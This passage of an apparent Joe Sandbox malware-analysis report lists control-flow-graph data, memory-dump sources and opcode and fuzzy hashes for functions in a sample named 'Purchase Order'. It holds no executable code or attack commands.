2461 1668c7b-1668c8a 2456->2461 2464 1668cc6-1668cd4 2460->2464 2465 1668dbf 2460->2465 2461->2460 2466 1668c8c-1668ca2 2461->2466 2470 1668cd6-1668cdb 2464->2470 2471 1668ce0-1668ce3 2464->2471 2467 1668dc1-1668dc5 2465->2467 2466->2460 2476 1668ca4-1668ca9 2466->2476 2470->2467 2472 1668dc6-1668dde 2471->2472 2473 1668ce9-1668cec 2471->2473 2473->2464 2475 1668cee 2473->2475 2475->2465 2476->2467
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'fq$4'fq
                                                                                                            • API String ID: 0-751858264
                                                                                                            • Opcode ID: 73b7aa2aa535468a4b07f4997b03bbaf62840ded8b520efbc28d7e2c9cffa656
                                                                                                            • Instruction ID: 7943ea59a3af6c10f5beb66c2b9214c43e6aec115e1ad57c8a42ab7b8ed36543
                                                                                                            • Opcode Fuzzy Hash: 73b7aa2aa535468a4b07f4997b03bbaf62840ded8b520efbc28d7e2c9cffa656
                                                                                                            • Instruction Fuzzy Hash: 81B14FB43017018FEB155F3DCD58B3D3AAEAF84640F154069EA06CB3A9EB29DC829781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01665700 Relevance: 2.8, Strings: 2, Instructions: 323COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2478 1665700-1665722 2479 1665724-1665728 2478->2479 2480 1665738-1665743 2478->2480 2481 1665750-1665757 2479->2481 2482 166572a-1665736 2479->2482 2483 16657eb-1665817 2480->2483 2484 1665749-166574b 2480->2484 2486 1665777-1665780 2481->2486 2487 1665759-1665760 2481->2487 2482->2480 2482->2481 2492 166581e-1665876 2483->2492 2485 16657e3-16657e8 2484->2485 2581 1665782 call 1665700 2486->2581 2582 1665782 call 16656f0 2486->2582 2487->2486 2489 1665762-166576d 2487->2489 2491 1665773-1665775 2489->2491 2489->2492 2490 1665788-166578a 2493 1665792-166579a 2490->2493 2494 166578c-1665790 2490->2494 2491->2485 2510 1665885-1665897 2492->2510 2511 1665878-166587e 2492->2511 2497 166579c-16657a1 2493->2497 2498 16657a9-16657ab 2493->2498 2494->2493 2496 16657ad-16657cc call 1666168 2494->2496 2504 16657e1 2496->2504 2505 16657ce-16657d7 2496->2505 2497->2498 2498->2485 2504->2485 2579 16657d9 call 166a6b0 2505->2579 2580 16657d9 call 166a76d 2505->2580 2507 16657df 2507->2485 2513 166589d-16658a1 2510->2513 2514 166592b-166592f call 1665ac8 2510->2514 2511->2510 2515 16658a3-16658af 2513->2515 2516 16658b1-16658be 2513->2516 2517 1665935-166593b 2514->2517 2522 16658c0-16658ca 2515->2522 2516->2522 2518 1665947-166594e 2517->2518 2519 166593d-1665943 2517->2519 2523 1665945 2519->2523 2524 16659a9-16659f7 2519->2524 2527 16658f7-16658fb 2522->2527 2528 16658cc-16658db 2522->2528 2523->2518 2583 16659f9 call 6e925e8 2524->2583 2584 16659f9 call 6e923d1 2524->2584 2585 16659f9 call 6e923e0 2524->2585 2529 1665907-166590b 2527->2529 2530 16658fd-1665903 2527->2530 2539 16658dd-16658e4 2528->2539 2540 16658eb-16658f5 2528->2540 2529->2518 2535 166590d-1665911 2529->2535 2533 1665905 2530->2533 2534 1665951-16659a2 2530->2534 2533->2518 2534->2524 2536 1665917-1665929 2535->2536 2537 1665a0f-1665a33 2535->2537 2536->2518 2546 1665a35-1665a37 2537->2546 2547 1665a39-1665a3b 2537->2547 2539->2540 2540->2527 2549 1665ab1-1665ab4 2546->2549 2550 1665a4c-1665a4e 2547->2550 2551 1665a3d-1665a41 2547->2551 2557 1665a50-1665a54 2550->2557 2558 1665a61-1665a67 2550->2558 2555 1665a47-1665a4a 2551->2555 2556 1665a43-1665a45 2551->2556 2555->2549 2556->2549 2559 1665a56-1665a58 2557->2559 2560 1665a5a-1665a5f 2557->2560 2562 1665a92-1665a94 2558->2562 2563 1665a69-1665a90 2558->2563 2559->2549 2560->2549 2565 1665a9b-1665a9d 2562->2565 2563->2565 2569 1665aa3-1665aa5 2565->2569 2570 1665a9f-1665aa1 2565->2570 2566 16659ff-1665a08 2566->2537 2571 1665aa7-1665aac 2569->2571 2572 1665aae 2569->2572 2570->2549 2571->2549 2572->2549 2579->2507 2580->2507 2581->2490 2582->2490 2583->2566 2584->2566 2585->2566
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Hjq$Hjq
                                                                                                            • API String ID: 0-2395847853
                                                                                                            • Opcode ID: 03b54f96f39df6f9a486b4088fc4d545a7b0026315e387ab59b3901cec8c2bef
                                                                                                            • Instruction ID: 8b9932f43606ebb9ec4b8e9221682dd090cfd46c854eeb4272455ebd34ef3573
                                                                                                            • Opcode Fuzzy Hash: 03b54f96f39df6f9a486b4088fc4d545a7b0026315e387ab59b3901cec8c2bef
                                                                                                            • Instruction Fuzzy Hash: 3EB1CF317052558FDB169F28C895B7E7BEAAF88390F048529E907CB395DB38DC42CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E923E0 Relevance: 2.7, Strings: 2, Instructions: 234COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LRfq$LRfq
                                                                                                            • API String ID: 0-2141892265
                                                                                                            • Opcode ID: c17b80cfbaf9de4378a5a20b0e50ad439d55de244219e78f4f60fbf46770cbfe
                                                                                                            • Instruction ID: 4fe7db5514cb8b405c01a898f57561b0b7b4c4af6d6f91cf69ce3138948d9d42
                                                                                                            • Opcode Fuzzy Hash: c17b80cfbaf9de4378a5a20b0e50ad439d55de244219e78f4f60fbf46770cbfe
                                                                                                            • Instruction Fuzzy Hash: 5381B034B202069FCF48DF79D95496E77B2EF88650B1184A9E605DB3B9DB30DD02CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01665C60 Relevance: 2.7, Strings: 2, Instructions: 230COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ,jq$,jq
                                                                                                            • API String ID: 0-3554820393
                                                                                                            • Opcode ID: a64ae4c60285346704f1e53623d691989f7929d3c6a439977b1558afcc8d5a45
                                                                                                            • Instruction ID: 56fc4c0f320c0ea9e6ecdd232d01b36e770e4a47f03acc9259f065494b693330
                                                                                                            • Opcode Fuzzy Hash: a64ae4c60285346704f1e53623d691989f7929d3c6a439977b1558afcc8d5a45
                                                                                                            • Instruction Fuzzy Hash: 1F818D35A001059FCB14CF6DCC8996ABBBAFF88284B55816AD506DB3A5DB31EC42CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E99510 Relevance: 2.7, Strings: 2, Instructions: 209COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (&fq$(jq
                                                                                                            • API String ID: 0-269942299
                                                                                                            • Opcode ID: a845b7577a51d221ee1cf289c10d42e149117cab1d5bb6d2bf376a2af931627f
                                                                                                            • Instruction ID: 38b49ff7d4ee8cb7a6003de178db2365159079d67df467e2b4b02d8a07b1de20
                                                                                                            • Opcode Fuzzy Hash: a845b7577a51d221ee1cf289c10d42e149117cab1d5bb6d2bf376a2af931627f
                                                                                                            • Instruction Fuzzy Hash: 8571A171F002599BDF59DFB9C8506DEBBB6AF98700F14842AD406A7385DF309D06CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01663480 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Xjq$Xjq
                                                                                                            • API String ID: 0-958142700
                                                                                                            • Opcode ID: 74c4c64a9678362228cf01f1943ba8826ab1b2e24cfeab373e1217cc61685043
                                                                                                            • Instruction ID: eae098d20cf5a991be807affe8f776cee1ac1aaebcca3a8f1b09e1fd5927e6a7
                                                                                                            • Opcode Fuzzy Hash: 74c4c64a9678362228cf01f1943ba8826ab1b2e24cfeab373e1217cc61685043
                                                                                                            • Instruction Fuzzy Hash: 8931F375B013248BDB1D4A6D9D9427EA6EEBBC4210F18403ED91BC7384DFB4CC4596A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01660C8F Relevance: 1.7, Strings: 1, Instructions: 419COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LRfq
                                                                                                            • API String ID: 0-2333822924
                                                                                                            • Opcode ID: 2c4fb95b3dec7fdac533e3bb7ac355e552237da2382d628e8bb4b9f0ca43c1d2
                                                                                                            • Instruction ID: e14b24b37ad5a762f925e04ed66654c281971ed1101d291fd104874df539f635
                                                                                                            • Opcode Fuzzy Hash: 2c4fb95b3dec7fdac533e3bb7ac355e552237da2382d628e8bb4b9f0ca43c1d2
                                                                                                            • Instruction Fuzzy Hash: 9A32D874A01219CFCB58DF68E988A9DBBF2FF48301F1085AAE809A7355DB346D85CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01660CA0 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LRfq
                                                                                                            • API String ID: 0-2333822924
                                                                                                            • Opcode ID: e965484b238be698c9828654a51e48c98bd946cc655a585635f54764ae0b3565
                                                                                                            • Instruction ID: 6a832c92bf9d97285c311cacbf7c42d930b793d5c97cf68c83ed707fbd618a40
                                                                                                            • Opcode Fuzzy Hash: e965484b238be698c9828654a51e48c98bd946cc655a585635f54764ae0b3565
                                                                                                            • Instruction Fuzzy Hash: 4D22D874A01219CFCB58DF68E988A9DBBF2FF48301F1085AAE809A7355DB346D85CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DB7F8C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LdrInitializeThunk.NTDLL(00000000), ref: 05DB80CE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 5e88947d0d0102cfb3300c5ac46670ac50f526dc6c27de0a3521452bd3c63b14
                                                                                                            • Instruction ID: 3797fb0d4aae5ac580dd0a46641d4bd2e999dcceb6fa2f21ef86b91b0991e316
                                                                                                            • Opcode Fuzzy Hash: 5e88947d0d0102cfb3300c5ac46670ac50f526dc6c27de0a3521452bd3c63b14
                                                                                                            • Instruction Fuzzy Hash: 73116D74E02109CFEB04DBE8D984EEDBBFAFB88344F548156E805A7245D7B0D981DB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166A6B0 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (ofq
                                                                                                            • API String ID: 0-334256475
                                                                                                            • Opcode ID: 2f09aaf811af6c2d6658a87db35414606ccc79cbf4bda0e7050244dae4703dbf
                                                                                                            • Instruction ID: 694748a3e4ae685f11b6a458700033daec344c91e1c55badaae3fba9113cee76
                                                                                                            • Opcode Fuzzy Hash: 2f09aaf811af6c2d6658a87db35414606ccc79cbf4bda0e7050244dae4703dbf
                                                                                                            • Instruction Fuzzy Hash: C441BF397012448FCB15AFA9E9546AE7BF6BFC8211F148569D906E73A0CF349C02CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01667840 Relevance: .6, Instructions: 571COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 832625ce4165ee1db74f7254f49287c58ba87733bb234cba517bf1a3e7ff5d24
                                                                                                            • Instruction ID: e702cc044d2cf338588cb313371c6b2c8537e81353c88b9c2b69cebf1b75f998
                                                                                                            • Opcode Fuzzy Hash: 832625ce4165ee1db74f7254f49287c58ba87733bb234cba517bf1a3e7ff5d24
                                                                                                            • Instruction Fuzzy Hash: 8C42BD74A1121D8FEB54DBE8C860B9EBBB6FB94300F1081A9C20A673A5CF359D85DF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166A878 Relevance: .4, Instructions: 410COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d6072fb958cf86bf7a997e51e5e78a48f967cb0c7ddd5b8ca49c4e161f0c2844
                                                                                                            • Instruction ID: 7fc4f531fdf2cf662048fff6f0f88aff4f0e949429b0b70baba1ca07cc83ca04
                                                                                                            • Opcode Fuzzy Hash: d6072fb958cf86bf7a997e51e5e78a48f967cb0c7ddd5b8ca49c4e161f0c2844
                                                                                                            • Instruction Fuzzy Hash: 2BF13E75A001148FCB04CFADC984A9DBBFAFF88310B1A8159E519BB365CB35EC51CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01667498 Relevance: .2, Instructions: 201COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 642259e0f5a7a8ba80ee5c593372dabaef929f400164a5ad98533a174bbe03b7
                                                                                                            • Instruction ID: c1be2561e3b5269add966f1b4e7284c76af606922292bfbd496d5bb781442d93
                                                                                                            • Opcode Fuzzy Hash: 642259e0f5a7a8ba80ee5c593372dabaef929f400164a5ad98533a174bbe03b7
                                                                                                            • Instruction Fuzzy Hash: E97139347002568FDB15DF2CC898AAD7BEAAF99314F1904A9E906CB3B1DB74DC41CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9FC20 Relevance: .2, Instructions: 189COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8cf92c63204bafefd079c0314a3ab1f33bdc9a5c523ab23b08bd3fa471cca41b
                                                                                                            • Instruction ID: 85167b20257aac7a3ae09c87a981adcaa51a1d36b40c7bf3f177553bd35f5f9d
                                                                                                            • Opcode Fuzzy Hash: 8cf92c63204bafefd079c0314a3ab1f33bdc9a5c523ab23b08bd3fa471cca41b
                                                                                                            • Instruction Fuzzy Hash: 32712375E013199FDF55DFA4D8589ADBBB2BF89300F10812AE506EB364DB349942CF81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166E087 Relevance: .2, Instructions: 174COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dbc1d62b6863e6972439f39f20c4dd06487943653bb47400c3e2804c0615359c
                                                                                                            • Instruction ID: 4dda3dd36f5c6068ba78fa5436cd776e3d8ec548c0870f65e94a7f611e405c31
                                                                                                            • Opcode Fuzzy Hash: dbc1d62b6863e6972439f39f20c4dd06487943653bb47400c3e2804c0615359c
                                                                                                            • Instruction Fuzzy Hash: BD613274E01218CFDB15DFA8D998AEDBBB2FF89300F208129D805AB3A4DB755985CF40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166D3C2 Relevance: .2, Instructions: 174COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bca3c218c89bf077fc92c5eb090b9684f29798d0cd1c23e80884148752dc261e
                                                                                                            • Instruction ID: f80a71cd731e951e411f4f284c74d695ba7787a82767ae66539e191b9aa9a0c4
                                                                                                            • Opcode Fuzzy Hash: bca3c218c89bf077fc92c5eb090b9684f29798d0cd1c23e80884148752dc261e
                                                                                                            • Instruction Fuzzy Hash: EA51BA340733429FD3613B24A5AC17FBBA4FF0F323701AD49A81E99468EB3900A49B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166D3D0 Relevance: .2, Instructions: 169COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2ce044e816f4776607c0d78c85f13536b86471cf2c21fbc8c8a8cd220dd391e7
                                                                                                            • Instruction ID: 3db8d4d78c2dc3b244c5eb6b1f92d03b410efbfd1dc9c893b7e150c31c6bc92a
                                                                                                            • Opcode Fuzzy Hash: 2ce044e816f4776607c0d78c85f13536b86471cf2c21fbc8c8a8cd220dd391e7
                                                                                                            • Instruction Fuzzy Hash: 8651AA740733428FD3213B24B5AC13FBBA5FF0F327741AC85A81E89428EB3840A48B64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166D719 Relevance: .2, Instructions: 154COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1b1076b8b88927330c3b24f9b82e1db1072a42c2cbfe63d8737d3a02ab70fe5c
                                                                                                            • Instruction ID: 7acf87993c86ec6df663e4c49d357f5af7fa0d090815aef1c8a35b7ca3ef06ee
                                                                                                            • Opcode Fuzzy Hash: 1b1076b8b88927330c3b24f9b82e1db1072a42c2cbfe63d8737d3a02ab70fe5c
                                                                                                            • Instruction Fuzzy Hash: 1051F470E01208CFDB04DFE9D984AADBBF6FF89300F149529D409AB264DB34A986CB54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01663951 Relevance: .1, Instructions: 142COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2c1ad4e9f78345da6fd126be85f0f50b09ec0c7986868494e750eb740c6bede7
                                                                                                            • Instruction ID: 69ba1d14edcb562f67576df54406aaccda1ee1c8ebbb260618d3caac691263db
                                                                                                            • Opcode Fuzzy Hash: 2c1ad4e9f78345da6fd126be85f0f50b09ec0c7986868494e750eb740c6bede7
                                                                                                            • Instruction Fuzzy Hash: 9C51BA74E01208CFCB48DFA9E98499DBBF6FF89310B209469E805AB365DB35AD45CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166CD70 Relevance: .1, Instructions: 138COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b29a5d402e27460952dc1ba0a93f7698c20b920fe4353f352d32114407fcfdf8
                                                                                                            • Instruction ID: 697e7789cababb4ad1706b563672ee609ce3f0245e446a9558895a7880512945
                                                                                                            • Opcode Fuzzy Hash: b29a5d402e27460952dc1ba0a93f7698c20b920fe4353f352d32114407fcfdf8
                                                                                                            • Instruction Fuzzy Hash: E7517374E01208DFDB54DFAAD58499DBBF2BF89300F24816AE819AB364DB31A905CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01663960 Relevance: .1, Instructions: 134COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8a244e2d44a8fd579162397cd2d732c730c8fbe44e4ef59b6287c245fb19f875
                                                                                                            • Instruction ID: 0eede1b6e65307505380a8d939ebae4948331ee5c455b7542fe635fbb461d104
                                                                                                            • Opcode Fuzzy Hash: 8a244e2d44a8fd579162397cd2d732c730c8fbe44e4ef59b6287c245fb19f875
                                                                                                            • Instruction Fuzzy Hash: 7F51BB74E01208CFCB48DFA9E99499DBBF6FF89310B209469E805AB365DB35AD41CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01669AC3 Relevance: .1, Instructions: 124COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 560dc15ea1fa9cd126a23a3ec6bec56cab9a0e3ca36958f6c2cde1fef45c01a1
                                                                                                            • Instruction ID: 9a82323e07daa9faabd39ebb4cf672d26371795b96226a0a1d6626fc851c4956
                                                                                                            • Opcode Fuzzy Hash: 560dc15ea1fa9cd126a23a3ec6bec56cab9a0e3ca36958f6c2cde1fef45c01a1
                                                                                                            • Instruction Fuzzy Hash: 9E417A35A042499FCF15CFA9CC44AAEBFFAEF89318F048155ED15AB296D334A911CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E99500 Relevance: .1, Instructions: 117COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 62190f8acd17febc27f079287047fdfa67bda97d2ac0a00a9186caa83a583083
                                                                                                            • Instruction ID: 37aa539e65613b4ea562cf220116ca1428a8031ede7d9534a200a4baf6e595bc
                                                                                                            • Opcode Fuzzy Hash: 62190f8acd17febc27f079287047fdfa67bda97d2ac0a00a9186caa83a583083
                                                                                                            • Instruction Fuzzy Hash: 58419571E103099BDF14CFA5C980ADEB7F5AF88710F188129E415B7395EB70AD45CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E99A49 Relevance: .1, Instructions: 114COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 52c93e4bb0fd317c4e95127d614b9cff6ed27be8ab62d0d27e63ada5634a6e6b
